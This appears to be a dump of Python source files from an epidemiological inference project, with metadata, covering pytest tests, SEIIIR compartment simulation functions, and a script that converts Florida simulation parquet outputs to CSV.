1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_blike(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n # Note, we expect errors here since the models are not the same\n assert beta == pytest.approx(results['est_beta'], 1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_blike_analysis_window():\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_blike(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window={'days':10},\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n # Note, we expect errors here since the models are not the same\n assert beta == pytest.approx(results['est_beta'], 1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_blike_nonunity_reporting_factor():\n # test with non-unity reporting factor\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n \n results = run_decay_blike(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n analysis_window=dict(),\n report_delay=report_delay,\n reporting_factor=rho,\n Cdates=Cdates\n )\n \n # Note, we expect errors here since the models are not the same\n assert beta == pytest.approx(results['est_beta'], 1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_blike_incorrect_reporting_factor():\n # test with incorrect reporting factor\n # here, we expect some error, especially with larger beta values (since the S/N\n # term is inaccurate)\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho_assumed = 2\n rho_actual = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho_actual, N=N,\n report_delay=report_delay,\n tx=tx)\n \n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n analysis_window=dict(),\n report_delay=report_delay,\n reporting_factor=rho_assumed,\n Cdates=Cdates\n )\n\n # Note, we expect errors here since the models are not the same\n assert beta == pytest.approx(results['est_beta'], 1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_blike_zero_data():\n # test that the status flags are correct when the solve does not set a value for beta\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n # test the inference with no data\n zeroC = [0]*(tf+1)\n Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=tf+1).to_pydatetime().tolist()\n results = run_decay_blike(cm_rep_cases=zeroC,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert results['est_beta'] is None\n assert results['status'] == 'failed'\n assert results['msg'] == 'Transmission parameter beta not solved (stale) in least-squares initialization.'\n\ndef test_multinode_decay_lsq_standard():\n \"\"\"\n Test the multinode decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(C), '1': list(C), '3': list(C)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n # here, all three columns are the same, so we would expect beta to match\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\n@pytest.mark.skip('analysis_window not yet implemented for multinode decay')\ndef test_multinode_decay_analysis_window():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(C), '1': list(C), '3': list(C)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window={'days':10},\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_multinode_decay_lsq_nonunity_reporting_factor():\n # test with non-unity reporting factor\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(C), '1': list(C), '3': list(C)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_multinode_decay_lsq_incorrect_reporting_factor():\n # test with incorrect reporting factor\n # here, we expect some error, especially with larger beta values (since the S/N\n # term is inaccurate)\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho_assumed = 2\n rho_actual = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho_actual, N=N,\n report_delay=report_delay,\n tx=tx)\n \n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(C), '1': list(C), '3': list(C)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=2,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'],1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_multinode_decay_lsq_zero_data():\n # test that the status flags are correct when the solve does not set a value for beta\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n # test the inference with no data\n zeroC = [0]*(tf+1)\n Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=tf+1).to_pydatetime().tolist()\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(zeroC), '1': list(zeroC), '3': list(zeroC)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert results['est_beta'] is None\n assert results['status'] == 'failed'\n assert results['msg'] == 'Transmission parameter beta not solved (stale).'\n\ndef test_multinode_decay_lsq_diff_beta():\n # test with different beta values for each column\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n cm_rep_cases = list()\n for beta in [0.5, 0.75, 1.0]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n cm_rep_cases.append(C)\n\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(cm_rep_cases[0]), '1': list(cm_rep_cases[1]), '3': list(cm_rep_cases[2])})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n # this is the result we obtain - beta seems weighted to the column with the most cases\n assert 0.888 == pytest.approx(results['est_beta'],1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n" }, { "alpha_fraction": 0.8290196061134338, "alphanum_fraction": 0.8313725590705872, "avg_line_length": 66.10526275634766, "blob_id": "9289fdc488f25cbb6939a7a94b7c1ffde4f02672", "content_id": "f987d788efe2bd5fa9f8ddc97d7d03d4c208af0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1275, "license_type": "no_license", "max_line_length": 108, "num_lines": 19, "path": "/epi_inference/formulations/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#from .multinode_decay_lsq import run_multinode_decay_lsq\nfrom .multinode_mobility_decay_lsq import run_multinode_mobility_decay_lsq\nfrom .multinode_mobility_window_decay_lsq import run_multinode_mobility_window_decay_lsq\nfrom .multinode_mobility_window_decay_lsq_poek import run_multinode_mobility_window_decay_lsq_poek\nfrom .multinode_mobility_window_decay_lsq_old import run_multinode_mobility_window_decay_lsq_old\nfrom .multinode_mobility_window_decay_lsq_iterative import run_multinode_mobility_window_decay_lsq_iterative\n#from .multinode_mobility_time_varying_decay_lsq import run_multinode_mobility_time_varying_decay_lsq\n#from .multinode_decay_multibeta_lsq import run_multinode_decay_multibeta_lsq\nfrom .decay_lsq import run_decay_lsq\n#from .decay_multibeta_lsq import run_decay_multibeta_lsq\nfrom .decay_blike import run_decay_blike\n#from .multibeta_singleomega_decay_lsq import run_multibeta_singleomega_decay_lsq\n#from .multibeta_singleomegawin_decay_lsq import run_multibeta_singleomegawin_decay_lsq\n#from .multibeta_singleomegawin_decay_l1 import run_multibeta_singleomegawin_decay_l1\n#from .multibeta_multiwin_decay_lsq import run_multibeta_multiwin_decay_lsq\n\nfrom . import inference_json2csv_wf\nfrom . import inference_mobility_windows_wf\nfrom . import util\n" }, { "alpha_fraction": 0.38509318232536316, "alphanum_fraction": 0.7577639818191528, "avg_line_length": 22, "blob_id": "b24f37d5833d9b920afb3913672ab98803f15011", "content_id": "c00447d0508a9e6748372de04c576412246fa68e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 62, "num_lines": 7, "path": "/examples/expdata/exp3/info.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# Experimental results generated for around_md seeded at 24031\n#\nbeta = 0.6388888888888888\nR0 = 2.5555555555555554\ngamma = 0.25\nsigma = 0.1923076923076923\n" }, { "alpha_fraction": 0.7435897588729858, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 12, "blob_id": "8985c2b6a59d2bcb9f989b7ed6f60b88cf8b30f2", "content_id": "c66304a1961f1ec7352fb4e51535ce75e4302f23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 39, "license_type": "no_license", "max_line_length": 34, "num_lines": 3, "path": "/examples/README.txt", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# This directory contains examples\n#\n" }, { "alpha_fraction": 0.5374841094017029, "alphanum_fraction": 0.5481938719749451, "avg_line_length": 44.83333206176758, "blob_id": "e7aefa9d3594da134bb93c1c299c9b76f3c26ce3", "content_id": "995be5a37b66285d6d3aa6ff5be89a6e209bf43b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5509, "license_type": "no_license", "max_line_length": 125, "num_lines": 120, "path": "/epi_inference/evaluation/simulated-data/bin/create-simulated-data-from-pipeline-parquet-files.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import sys\nimport pandas as pd\npd.set_option(\"display.max_rows\", None)\nimport csv\nfrom os import listdir, makedirs\nfrom os.path import isfile, join, splitext, exists\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfor shortlong in ['short', 'long']:\n output_path = './data/florida-{}/'.format(shortlong)\n if not exists(output_path):\n makedirs(output_path)\n for strR0 in ['2.25']: #['1.25', '1.50', '1.75', '2.00', '2.25', '2.50', '2.75', '3.00']:\n path = '../pipeline_simulation/florida/model_output/florida-R0-{}-{}_None'.format(strR0, shortlong)\n\n # get the list of all the parquet files (one for each realization)\n files = list()\n for f in listdir(path):\n if isfile(join(path, f)):\n filename, extension = splitext(f)\n if extension == '.parquet':\n files.append(filename)\n\n # read the parquet files and output the data in csv\n d = dict()\n counties = None\n dates = None\n # loop over all realizations\n for i,f in enumerate(files):\n print('processing realization ... ', i)\n parquet_file = join(path, '{}.parquet'.format(f))\n df = pd.read_parquet(parquet_file, engine='pyarrow')\n\n # write out the original file\n fname = join(output_path, 'FL_{}_realization_{}_original_parquet.csv'.format(strR0, i))\n df.to_csv(fname, index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n # adjust the names of the columns to align with ours\n # change time to Date\n # change the FIPS codes from float to string\n rename_dict = {'time': 'Date'}\n for c in df.columns:\n if c.endswith('.0'):\n rename_dict[c] = c[:-2]\n df = df.rename(columns=rename_dict)\n # change the order so Date is first\n reorder = ['Date']\n for c in df.columns:\n if c != 'Date':\n reorder.append(c)\n df = df.reindex(columns=reorder)\n\n # write the SEIIIR output\n fname = join(output_path, 'FL_SEIIIR_R0_{}_{}_realization_{}.csv'.format(strR0, shortlong, i))\n df.to_csv(fname, index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n # build a dataframe of their cumulative reported cases\n dfcmI = df[df['comp'] == 'cumI'].copy()\n del dfcmI['comp']\n\n # shift all the cases by 3 days (they count cumI at ~5 days and we want a total of 8 days)\n mask = ~(dfcmI.columns.isin(['Date']))\n cols_to_shift = dfcmI.columns[mask]\n dfcmI[cols_to_shift] = dfcmI[cols_to_shift].shift(+3, fill_value=0.0).copy()\n # let's apply a reporting factor of 1/10 and then round\n dfcmI = dfcmI.set_index('Date')\n dfcmI = dfcmI.multiply(0.1)\n dfcmI = dfcmI.round()\n dfcmI = dfcmI.reset_index()\n fname = join(output_path, 'FL_cumulative_I_shifted_R0_{}_{}_realization_{}.csv'.format(strR0, shortlong, i))\n dfcmI.to_csv(fname, index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n ###\n # build a dataframe of cumulative reported cases using stochastic\n # process parameters from Derek - get the transmissions from the\n # simulated values in the S compartment\n dftx = df[df['comp'] == 'S']\n del dftx['comp']\n dftx = dftx.set_index('Date')\n dftx = dftx.diff()\n dftx.iloc[0] = 0\n dftx = dftx.abs().astype(int)\n # dftx is now the transmissions with the date that they occured\n # for each of these transmissions, let's find out when they are reported\n dfrepcases = pd.DataFrame({'Date': dftx.index})\n for c in dftx.columns:\n dftxc = dftx[c]\n dftxcv = dftxc.values\n repcases = np.zeros(dftxc.values.shape)\n\n for d in range(len(dftxc)):\n # total number of transmissions on index day d\n n_tx = dftxcv[d]\n # compute the number that are reported\n reporting_probability = 0.1\n n_reported_tx = np.random.binomial(n_tx, reporting_probability)\n\n # compute when they are reported\n delays_days = np.random.lognormal(mean=np.log(8), sigma=np.log(1.35), size=n_reported_tx)\n assert type(delays_days) is np.ndarray\n delays_days = np.round(delays_days).astype(int)\n for delay in delays_days:\n if d+delay < len(repcases):\n repcases[d+delay] += 1\n\n dfrepcases[c] = repcases\n\n # for d in range(len(dftxc)):\n # print(dftxcv[d], repcases[d])\n # print(sum(dftxcv), sum(repcases))\n # quit()\n\n dfrepcases = dfrepcases.set_index('Date')\n dfcmI = dfcmI.set_index('Date')\n dfcmrepcases = dfrepcases.cumsum()\n dfcmrepcases = dfcmrepcases.reset_index()\n fname = join(output_path, 'FL_cumulative_reported_cases_R0_{}_{}_realization_{}.csv'.format(strR0, shortlong, i))\n dfcmrepcases.to_csv(fname, index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n \n" }, { "alpha_fraction": 0.5699300765991211, "alphanum_fraction": 0.5999001264572144, "avg_line_length": 39.85714340209961, "blob_id": "cbfa306d1edab826bc7c8df32df1ca81e1ae6371", "content_id": "6dcfa7c561864afa7ef2016eeb317f5313d6e387", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2002, "license_type": "no_license", "max_line_length": 138, "num_lines": 49, "path": "/epi_inference/tseir_utils.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pyomo.environ as pe\nimport pyomo.dae as dae\nimport math\n\ndef reported_cases_from_cumulative(cumulative_reported_cases):\n cumul_rep_cases = [0] + cumulative_reported_cases\n reported_cases = [cumul_rep_cases[i] - cumul_rep_cases[i-1] for i in range(1,len(cumul_rep_cases))]\n return reported_cases\n\ndef compute_compartments_time_delay(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor): # pragma: no cover\n print(\"WARNING - THIS CODE IS NOT TESTED\")\n reported_cases = reported_cases_from_cumulative(cumulative_reported_cases)\n cases = [reporting_factor*c for c in reported_cases]\n\n S = [None]*len(cases)\n S[0] = population\n E = [0]*len(cases)\n I = [0]*len(cases)\n R = [0]*len(cases)\n for t in range(len(cases)):\n if t+1 < len(cases):\n S[t+1] = S[t] - cases[t]\n if t - deltaE - deltaI >= 0:\n R[t+1] = R[t] + cases[t-deltaE-deltaI]\n E[t] = sum(cases[t-tau] for tau in range(1,deltaE+1) if t-tau >= 0)\n I[t] = sum(cases[t-deltaE-tau] for tau in range(1,deltaI+1) if t-deltaE-tau >= 0)\n return cases, S, E, I, R\n\ndef compute_compartments_decay(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor):\n reported_cases = reported_cases_from_cumulative(cumulative_reported_cases)\n cases = [reporting_factor*c for c in reported_cases]\n\n S = [None]*len(cases)\n S[0] = population\n E = [0]*len(cases)\n I1 = [0]*len(cases)\n I2 = [0]*len(cases)\n I3 = [0]*len(cases)\n R = [0]*len(cases)\n for t in range(len(cases)-1):\n S[t+1] = S[t] - cases[t]\n E[t+1] = E[t] + cases[t] - sigma*E[t]\n I1[t+1] = I1[t] + sigma*E[t] - gamma_1*I1[t]\n I2[t+1] = I2[t] + gamma_1*I1[t] - gamma_2*I2[t]\n I3[t+1] = I3[t] + gamma_2*I2[t] - gamma_3*I3[t]\n R[t+1] = R[t] + gamma_3*I3[t]\n #I = [I1[t] + I2[t] + I3[t] for t in len(cases)]\n return cases, S, E, I1, I2, I3, R\n" }, { "alpha_fraction": 0.5377113223075867, "alphanum_fraction": 0.5774660706520081, "avg_line_length": 33.59807205200195, "blob_id": "33108e948de18ff840da49d418c0df3eec138b2f", "content_id": "0d8097d3ff9ce4d77918bcf5d864fc5304fa2def", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10766, "license_type": "no_license", "max_line_length": 132, "num_lines": 311, "path": "/epi_inference/simulation/simulation.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "\"\"\"\nThis module contains some simple simulation models for testing the \ninference methods\n\"\"\"\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport numpy as np\nfrom scipy.integrate import odeint\nfrom pyutilib.misc.misc import Bunch\n\n# the '*' forces the caller to use named keyword arguments\ndef simulate_continuous_seiiir_deterministic(*, y0, tf, beta, sigma, gamma, rho, N, report_delay, tx):\n \"\"\"\n This method simulates a deterministic seiiir model based on the given parameters.\n The model is continuous time and uses a scipy integrator\n \n Parameters\n ----------\n y0 : dict\n Initial values for the compartments. Should include keys for 'S', 'E', 'I1' ,'I2', 'I3', 'R'\n tf : int\n The number of days to simulate\n beta : float\n Transmission rate in contacts per day\n sigma : float\n This is the rate of transfer out of the exposed compartment (e.g., 1/(incubation period))\n gamma : float\n This model includes 3 infectious compartments. Therefore this is an approximation of the \n overall rate of transfer out of the I compartment. Here, we create three compartments,\n each with a rate of 3*gamma (where gamma is 1/(infectious period))\n rho : float\n This is the reporting factor. If rho=8, then 1 in 8 cases are reported\n N : number\n This is the overall population\n report_delay : int\n This is the number of days between infection and reporting\n tx : list of numbers or None\n The number of transmissions from external sources for each timestep. If set to None, then\n this is assumed to be zero\n \"\"\"\n assert tf > 1 and type(tf) is int\n assert N > 1\n assert y0['S'] <= N\n assert y0['E'] <= N\n assert y0['I1'] <= N\n assert y0['I2'] <= N\n assert y0['I3'] <= N\n assert y0['R'] <= N\n assert y0['S'] >= 0\n assert y0['E'] >= 0\n assert y0['I1'] >= 0\n assert y0['I2'] >= 0\n assert y0['I3'] >= 0\n assert y0['R'] >= 0\n assert beta >= 0\n assert sigma >=0\n assert gamma >= 0\n assert rho >= 1\n assert report_delay >= 1 and type(report_delay) is int\n assert tf > report_delay+1\n assert tx is None # not currently supported\n\n def model(y, t, beta, sigma, gamma, N):\n S=y[0]\n E=y[1]\n I1=y[2]\n I2=y[3]\n I3=y[4]\n R=y[5]\n C=y[6]\n\n rhs = np.zeros(7)\n rhs[0] = -beta*(I1+I2+I3)*S/N\n rhs[1] = beta*(I1+I2+I3)*S/N - sigma*E\n rhs[2] = sigma*E - 3*gamma*I1\n rhs[3] = 3*gamma*I1 - 3*gamma*I2\n rhs[4] = 3*gamma*I2 - 3*gamma*I3\n rhs[5] = 3*gamma*I3\n rhs[6] = beta*(I1+I2+I3)*S/N\n return rhs\n\n y = np.zeros(7)\n y[0] = y0['S']\n y[1] = y0['E']\n y[2] = y0['I1']\n y[3] = y0['I2']\n y[4] = y0['I3']\n y[5] = y0['R']\n y[6] = 0\n \n times = list(range(tf))\n\n y = odeint(lambda y,t : model(y, t, beta, sigma, gamma, N), y, times)\n S = y[:-1,0].tolist()\n E = y[:-1,1].tolist()\n I1 = y[:-1,2].tolist()\n I2 = y[:-1,3].tolist()\n I3 = y[:-1,4].tolist()\n R = y[:-1,5].tolist()\n C = y[:,6].tolist()\n T = [C[i+1]-C[i] for i in range(len(C)-1)]\n \n Cdates = pd.date_range(end=datetime(year=2020, month=5, day=15), periods=len(C)).to_pydatetime().tolist()\n dates = list()\n delta = timedelta(days=report_delay-1) # the -1 is because we add a 0 to the beginning of cm_rep_cases (to start at 0)\n for i in range(len(Cdates)-1):\n dates.append(Cdates[i]-delta)\n\n cumulative_reported_cases = Bunch(dates=Cdates, values=C)\n SEIIIR = Bunch(dates=dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T)\n return Bunch(cumulative_reported_cases=cumulative_reported_cases, SEIIIR=SEIIIR)\n \n\ndef simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx):\n \"\"\"\n This method simulates a deterministic seiiir model based on the given parameters.\n The model is discrete time and discretized by days\n \n Parameters\n ----------\n y0 : dict\n Initial values for the compartments. Should include keys for 'S', 'E', 'I1' ,'I2', 'I3', 'R'\n tf : int\n The number of days to simulate\n beta : float\n Transmission rate in contacts per day\n sigma : float\n This is the rate of transfer out of the exposed compartment (e.g., 1/(incubation period))\n gamma : float\n This model includes 3 infectious compartments. Therefore this is an approximation of the \n overall rate of transfer out of the I compartment. Here, we create three compartments,\n each with a rate of 3*gamma (where gamma is 1/(infectious period))\n rho : float\n This is the reporting factor. If rho=8, then 1 in 8 cases are reported\n N : number\n This is the overall population\n report_delay : int\n This is the number of days between infection and reporting\n tx : list of numbers or None\n The number of transmissions from external sources for each timestep. If set to None, then\n this is assumed to be zero\n \"\"\"\n assert tf > 1 and type(tf) is int\n assert N > 1\n assert y0['S'] <= N\n assert y0['E'] <= N\n assert y0['I1'] <= N\n assert y0['I2'] <= N\n assert y0['I3'] <= N\n assert y0['R'] <= N\n assert y0['S'] >= 0\n assert y0['E'] >= 0\n assert y0['I1'] >= 0\n assert y0['I2'] >= 0\n assert y0['I3'] >= 0\n assert y0['R'] >= 0\n assert beta >= 0\n assert sigma >=0\n assert gamma >= 0\n assert rho >= 1\n assert report_delay >= 1 and type(report_delay) is int\n assert tf > report_delay+1\n if tx is None:\n tx = [0]*tf\n\n S = [None]*tf\n E = [None]*tf\n T = [None]*tf # new transmissions\n I1 = [None]*tf\n I2 = [None]*tf\n I3 = [None]*tf\n R = [None]*tf\n\n S[0] = y0['S']\n E[0] = y0['E']\n I1[0] = y0['I1']\n I2[0] = y0['I2']\n I3[0] = y0['I3']\n R[0] = y0['R']\n\n cm_rep_cases = [None]*(tf+1)\n cm_rep_cases[0] = 0\n\n T[0] = beta * (I1[0] + I2[0] + I3[0]) * S[0] / N + tx[0]\n for t in range(0,tf-1):\n #print(T[t], S[t], E[t], I1[t], I2[t],I3[t],cm_rep_cases[t])\n assert T[t] >= 0\n S[t+1] = S[t] - T[t]\n S[t+1] = max(0,S[t+1])\n\n E[t+1] = E[t] + T[t] - sigma*E[t]\n E[t+1] = max(0, E[t+1])\n\n I1[t+1] = I1[t] + sigma*E[t] - gamma*3*I1[t]\n I1[t+1] = max(0, I1[t+1])\n\n I2[t+1] = I2[t] + gamma*3*I1[t] - gamma*3*I2[t]\n I2[t+1] = max(0, I2[t+1])\n\n I3[t+1] = I3[t] + gamma*3*I2[t] - gamma*3*I3[t]\n I3[t+1] = max(0, I3[t+1])\n\n R[t+1] = R[t] + gamma*3*I3[t]\n assert R[t+1] >= 0\n\n cm_rep_cases[t+1] = cm_rep_cases[t] + 1/rho*T[t]\n T[t+1] = beta * (I1[t+1] + I2[t+1] + I3[t+1]) * S[t+1] / N + tx[t+1]\n\n cm_rep_cases[tf] = cm_rep_cases[tf-1] + 1/rho*T[tf-1]\n cm_rep_cases_dates = pd.date_range(end=datetime(year=2020, month=5, day=15), periods=len(cm_rep_cases)).to_pydatetime().tolist()\n dates = list()\n delta = timedelta(days=report_delay-1) # the -1 is because we add a 